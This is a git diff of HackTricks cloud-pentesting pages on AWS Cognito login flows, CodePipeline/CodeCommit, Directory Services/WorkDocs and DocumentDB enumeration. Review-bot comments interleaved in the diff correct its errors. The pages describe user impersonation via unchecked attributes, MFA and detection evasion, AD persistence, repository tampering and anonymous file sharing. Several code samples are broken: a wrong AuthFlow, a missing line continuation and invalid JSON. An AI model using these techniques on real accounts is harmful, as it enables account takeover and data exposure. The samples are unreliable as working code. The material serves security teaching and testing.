**`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. 
+ +Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. +{% endhint %} + +Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**: + +```bash +aws cognito-idp verify-user-attribute \ + --access-token \ + --attribute-name email --code \ + --region --no-sign-request +``` + +Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**. + +{% hint style="info" %} +The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred\_username already being used** to impersonate a different user. +{% endhint %} + +### Recover/Change Password + +It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there: + +```bash +aws cognito-idp forgot-password \ + --client-id \ + --username --region +``` + +{% hint style="info" %} +The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users +{% endhint %} + +With the code you can change the password with: + +```bash +aws cognito-idp confirm-forgot-password \ + --client-id \ + --username \ + --confirmation-code \ + --password --region +``` + +To change the password you need to **know the previous password**: + +```bash +aws cognito-idp change-password \ + --previous-password \ + --proposed-password \ + --access-token +``` + +## Authentication + +A user pool supports **different ways to authenticate** to it. 
If you have a **username and password** there are also **different methods** supported to login.\ +Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**. + +* [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. + * The ID Token is the token that **contains the attributes values of the user**, even the custom ones. +* [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. +* [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. 
+ +### ADMIN\_NO\_SRP\_AUTH & ADMIN\_USER\_PASSWORD\_AUTH + +This is the server side authentication flow: + +* The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. +* After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. + +This **method is NOT enabled** by default. + +To **login** you **need** to know: + +* user pool id +* client id +* username +* password +* client secret (only if the app is configured to use a secret) + +{% hint style="info" %} +In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ +Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** +{% endhint %} + +```python +aws cognito-idp admin-initiate-auth \ + --client-id \ + --auth-flow ADMIN_USER_PASSWORD_AUTH \ + --region \ + --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' + --user-pool-id "" + +# Check the python code to learn how to generate the hsecret_hash +``` + +
+ +Code to Login + +```python +import boto3 +import botocore +import hmac +import hashlib +import base64 + + +client_id = "" +user_pool_id = "" +client_secret = "" +username = "" +password = "" + +boto_client = boto3.client('cognito-idp', region_name='us-east-1') + +def get_secret_hash(username, client_id, client_secret): + key = bytes(client_secret, 'utf-8') + message = bytes(f'{username}{client_id}', 'utf-8') + return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() + +# If the Client App isn't configured to use a secret +## just delete the line setting the SECRET_HASH +def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): + try: + return boto_client.admin_initiate_auth( + UserPoolId=user_pool_id, + ClientId=client_id, + AuthFlow='ADMIN_USER_PASSWORD_AUTH', + AuthParameters={ + 'USERNAME': username_or_alias, + 'PASSWORD': password, + 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) + } + ) + except botocore.exceptions.ClientError as e: + return e.response + +print(login_user(username, password, client_id, client_secret, user_pool_id)) +``` + +
+ +### USER\_PASSWORD\_AUTH + +This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW\_USER\_SRP\_AUTH** method instead (as that one never sends the password over the network).\ +This **method is NOT enabled** by default. + +The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool. + +To **login** you **need** to know: + +* client id +* username +* password +* client secret (only if the app is configured to use a secret) + +{% hint style="info" %} +In order to be **able to login with this method** that application must allow to login with ALLOW\_USER\_PASSWORD\_AUTH. +{% endhint %} + +```python +aws cognito-idp initiate-auth --client-id \ + --auth-flow USER_PASSWORD_AUTH --region \ + --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' + +# Check the python code to learn how to generate the secret_hash +``` + +
+ +Python code to Login + +```python +import boto3 +import botocore +import hmac +import hashlib +import base64 + + +client_id = "" +user_pool_id = "" +client_secret = "" +username = "" +password = "" + +boto_client = boto3.client('cognito-idp', region_name='us-east-1') + +def get_secret_hash(username, client_id, client_secret): + key = bytes(client_secret, 'utf-8') + message = bytes(f'{username}{client_id}', 'utf-8') + return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() + +# If the Client App isn't configured to use a secret +## just delete the line setting the SECRET_HASH +def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): + try: + return boto_client.initiate_auth( + ClientId=client_id, + AuthFlow='ADMIN_USER_PASSWORD_AUTH', + AuthParameters={ + 'USERNAME': username_or_alias, + 'PASSWORD': password, + 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) + } + ) + except botocore.exceptions.ClientError as e: + return e.response + +print(login_user(username, password, client_id, client_secret, user_pool_id)) +``` + +
+ +### USER\_SRP\_AUTH + +This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\ +This **method is enabled** by default. + +To **login** you **need** to know: + +* user pool id +* client id +* username +* password +* client secret (only if the app is configured to use a secret) + +
+ +Code to login + +```python +from warrant.aws_srp import AWSSRP +import os + +USERNAME='xxx' +PASSWORD='yyy' +POOL_ID='us-east-1_zzzzz' +CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx' +CLIENT_SECRET = 'secreeeeet' +os.environ["AWS_DEFAULT_REGION"] = "" + +aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, + client_id=CLIENT_ID, client_secret=CLIENT_SECRET) +tokens = aws.authenticate_user() +id_token = tokens['AuthenticationResult']['IdToken'] +refresh_token = tokens['AuthenticationResult']['RefreshToken'] +access_token = tokens['AuthenticationResult']['AccessToken'] +token_type = tokens['AuthenticationResult']['TokenType'] +``` + +
+ +### REFRESH\_TOKEN\_AUTH & REFRESH\_TOKEN + +This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token. + +```bash +aws cognito-idp initiate-auth \ + --client-id 3ig6h5gjm56p1ljls1prq2miut \ + --auth-flow REFRESH_TOKEN_AUTH \ + --region us-east-1 \ + --auth-parameters 'REFRESH_TOKEN=' +``` + +
+ +Code to refresh + +```python +import boto3 +import botocore +import hmac +import hashlib +import base64 + +client_id = "" +token = '' + +boto_client = boto3.client('cognito-idp', region_name='') + +def refresh(client_id, refresh_token): + try: + return boto_client.initiate_auth( + ClientId=client_id, + AuthFlow='REFRESH_TOKEN_AUTH', + AuthParameters={ + 'REFRESH_TOKEN': refresh_token + } + ) + except botocore.exceptions.ClientError as e: + return e.response + + +print(refresh(client_id, token)) +``` + +
+ +### CUSTOM\_AUTH + +In this case the **authentication** is going to be performed through the **execution of a lambda function**. + +## Extra Security + +### Advanced Security + +By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.** + +### **MFA Remember device** + +If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection. + +## User Pool Groups IAM Roles + +It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\ +Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached. + +Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool). + +Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.** + +
+ +The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\ +However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed): + +{% code overflow="wrap" %} +``` +An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN. +``` +{% endcode %} + +{% hint style="warning" %} +Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). +{% endhint %} + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "cognito-identity.amazonaws.com" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" + }, + "ForAnyValue:StringLike": { + "cognito-identity.amazonaws.com:amr": "authenticated" + } + } + } + ] +}js +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md new file mode 100644 index 0000000000..bc391a196b --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -0,0 +1,129 @@ +# AWS - DataPipeline, CodePipeline & CodeCommit Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
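Review bot: the USER_PASSWORD_AUTH Python sample in the Cognito page calls `boto_client.initiate_auth(...)` with `AuthFlow='ADMIN_USER_PASSWORD_AUTH'`, which the non-admin `InitiateAuth` API does not accept; it should be `AuthFlow='USER_PASSWORD_AUTH'`, matching the CLI example directly above it, and the `user_pool_id` parameter that `login_user` takes but never uses should be dropped, since the text itself says this flow does not need the pool ID. In the ADMIN_USER_PASSWORD_AUTH block the CLI invocation is fenced as `python` instead of `bash` and lacks a line-continuation backslash after `--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH='`, so `--user-pool-id ""` would be run as a separate shell command; the refresh-token sample imports `hmac`, `hashlib` and `base64` it never uses; the IAM trust-policy JSON at the end ends with a stray `}js` that breaks the JSON; and "you own't be able to register" should read "you won't be able to register".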
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## DataPipeline + +AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed: + +1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. +2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. +3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: + * Amazon S3 + * Amazon RDS + * Amazon DynamoDB + * Amazon EMR + +In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. + +### Enumeration + +```bash +aws datapipeline list-pipelines +aws datapipeline describe-pipelines --pipeline-ids +aws datapipeline list-runs --pipeline-id +aws datapipeline get-pipeline-definition --pipeline-id +``` + +### Privesc + +In the following page you can check how to **abuse datapipeline permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-datapipeline-privesc.md" %} +[aws-datapipeline-privesc.md](../aws-privilege-escalation/aws-datapipeline-privesc.md) +{% endcontent-ref %} + +## CodePipeline + +AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define. 
+ +### Enumeration + +```bash +aws codepipeline list-pipelines +aws codepipeline get-pipeline --name +aws codepipeline list-action-executions --pipeline-name +aws codepipeline list-pipeline-executions --pipeline-name +aws codepipeline list-webhooks +aws codepipeline get-pipeline-state --name +``` + +### Privesc + +In the following page you can check how to **abuse codepipeline permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-codepipeline-privesc.md" %} +[aws-codepipeline-privesc.md](../aws-privilege-escalation/aws-codepipeline-privesc.md) +{% endcontent-ref %} + +## CodeCommit + +It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud. + +It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools. 
+ +### Enumeration + +```bash +# Repos +aws codecommit list-repositories +aws codecommit get-repository --repository-name +aws codecommit get-repository-triggers --repository-name +aws codecommit list-branches --repository-name +aws codecommit list-pull-requests --repository-name + +# Approval rules +aws codecommit list-approval-rule-templates +aws codecommit get-approval-rule-template --approval-rule-template-name +aws codecommit list-associated-approval-rule-templates-for-repository --repository-name + +# Get & Put files +## Get a file +aws codecommit get-file --repository-name backend-api --file-path app.py +## Put a file +aws codecommit get-branch --repository-name backend-api --branch-name master +aws codecommit put-file --repository-name backend-api --branch-name master --file-content fileb://./app.py --file-path app.py --parent-commit-id + +# SSH Keys & Clone repo +## Get codecommit keys +aws iam list-ssh-public-keys #User keys for CodeCommit +aws iam get-ssh-public-key --user-name --ssh-public-key-id --encoding SSH #Get public key with metadata +# The previous command will give you the fingerprint of the ssh key +# With the next command you can check the fingerprint of an ssh key and compare them +ssh-keygen -f .ssh/id_rsa -l -E md5 + +# Clone repo +git clone ssh://@git-codecommit..amazonaws.com/v1/repos/ +``` + +## References + +* [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md new file mode 100644 index 0000000000..e659755c57 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md @@ -0,0 +1,147 @@ +# AWS - Directory Services / WorkDocs Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
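Review bot: in the CodeCommit "Get & Put files" block, the relation between the two commands is not explained: `aws codecommit get-branch` is there to obtain the branch's current `commitId`, which is what must be passed as `--parent-commit-id` to `put-file`, and a one-line comment saying so would stop readers from looking for the value elsewhere. It is also worth stating next to `put-file` that writing to a branch which a CodePipeline source stage watches will trigger a pipeline run, since that is the point of the technique from an attacker's perspective and the reason the action is noisy. Separately, the References entry points at the AWS analytics overview whitepaper, which does not cover CodePipeline or CodeCommit; either add the relevant developer-guide links or drop it.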
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Directory Services + +AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud. + +### Options + +Directory Services allows to create 5 types of directories: + +* **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. +* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. +* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. +* **Amazon Cognito User Pools**: This is the same as Cognito User Pools. +* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. 
+ +AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**. + +### Lab + +Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms\_ad\_tutorial\_test\_lab\_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) + +### Enumeration + +```bash +# Get directories and DCs +aws ds describe-directories +aws ds describe-domain-controllers --directory-id +# Get directory settings +aws ds describe-trusts +aws ds describe-ldaps-settings --directory-id +aws ds describe-shared-directories --owner-directory-id +aws ds get-directory-limits +aws ds list-certificates --directory-id +aws ds describe-certificate --directory-id --certificate-id +``` + +### Login + +Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:** + +* `.awsapps.com/connect` (Amazon Connect) +* `.awsapps.com/workdocs` (Amazon WorkDocs) +* `.awsapps.com/workmail` (Amazon WorkMail) +* `.awsapps.com/console` (Amazon Management Console) +* `.awsapps.com/start` (IAM Identity Center) + +### Privilege Escalation + +{% content-ref url="../aws-privilege-escalation/aws-directory-services-privesc.md" %} +[aws-directory-services-privesc.md](../aws-privilege-escalation/aws-directory-services-privesc.md) +{% endcontent-ref %} + +## Persistence + +### Using an AD user + +An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console. 
+ +Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\ +It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth). + +### Sharing AD (from victim to attacker) + +It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\ +However, this implies sharing the managed AD and also creating an VPC peering connection. + +You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1\_setup\_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) + +### ~~Sharing AD (from attacker to victim)~~ + +It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account. + +## WorkDocs + +Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents. + +AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools. 
+ +### Enumeration + +{% code overflow="wrap" %} +```bash +# Get AD users (Admin not included) +aws workdocs describe-users --organization-id +# Get AD groups (containing "a") +aws workdocs describe-groups --organization-id d-9067a0285c --search-query a + +# Create user (created inside the AD) +aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password --email-address name@directory.domain --organization-id + +# Get what each user has created +aws workdocs describe-activities --user-id "S-1-5-21-377..." + +# Get what was created in the directory +aws workdocs describe-activities --organization-id + +# Get folder content +aws workdocs describe-folder-contents --folder-id + +# Get file (a url to access with the content will be retreived) +aws workdocs get-document --document-id + +# Get resource permissions if any +aws workdocs describe-resource-permissions --resource-id + +# Add permission so anyway can see the file +aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER +## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ +``` +{% endcode %} + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-workdocs-privesc.md" %} +[aws-workdocs-privesc.md](../aws-privilege-escalation/aws-workdocs-privesc.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md new file mode 100644 index 0000000000..b19805d717 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md @@ -0,0 +1,66 @@ +# AWS - DocumentDB Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
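Review bot: in the WorkDocs Enumeration block of this hunk most commands have lost their argument values (`aws workdocs describe-users --organization-id`, `--folder-id`, `--document-id`, `--resource-id`, and `create-user ... --password` with nothing after the flag), and the share URL `https://.awsapps.com/workdocs/index.html#/share/document/` is missing both the site alias and the document id, so none of these lines run as written; use explicit placeholders such as `<organization-id>` and `<document-id>`, and make the one literal id `d-9067a0285c` in `describe-groups` a placeholder too so the block is consistent. The comment on `add-resource-permissions` should say plainly that `Type=ANONYMOUS,Role=VIEWER` makes the document readable by anyone holding the link, which is the exposure a defender auditing WorkDocs resource permissions should be looking for. Typos: `retreived` → `retrieved`, `acesible` → `accessible`, `so anyway can see the file` → `so anyone can see the file`, `creating an VPC peering connection` → `creating a VPC peering connection`, and `It doesn't look like possible` → `It doesn't look possible`.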
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## DocumentDB + +Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. + +### Enumeration + +```bash +aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" +aws docdb describe-db-instances #Get hostnames from here + +# Parameter groups +aws docdb describe-db-cluster-parameter-groups +aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name + +# Snapshots +aws docdb describe-db-cluster-snapshots +aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier +``` + +### NoSQL Injection + +As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} + +### DocumentDB + +{% content-ref url="../aws-unauthenticated-enum-access/aws-documentdb-enum.md" %} +[aws-documentdb-enum.md](../aws-unauthenticated-enum-access/aws-documentdb-enum.md) +{% endcontent-ref %} + +## References + +* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md new file mode 100644 index 0000000000..97e9beeae1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -0,0 +1,206 @@ +# AWS - DynamoDB Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
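Review bot: the `### DocumentDB` heading in the aws-documentdb-enum.md hunk sits above a content-ref to `aws-unauthenticated-enum-access/aws-documentdb-enum.md`, so it repeats the page title and hides what the link is for; rename it `### Unauthenticated Access`, the heading the sibling DynamoDB and EC2 pages in this same patch use for the equivalent link. In the Enumeration block, `describe-db-cluster-parameters --db-cluster-parameter-group-name` and `describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier` have no value after the flag, and the latter carries `--region us-east-1 --profile ad`, a profile name from the author's own environment that no other command on the page uses; drop the profile and region and use `<parameter-group-name>` / `<snapshot-id>` placeholders. The single entry under `## References` (the Performance Insights blog post) is not cited anywhere in the text, so either reference it where it applies or remove the section.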
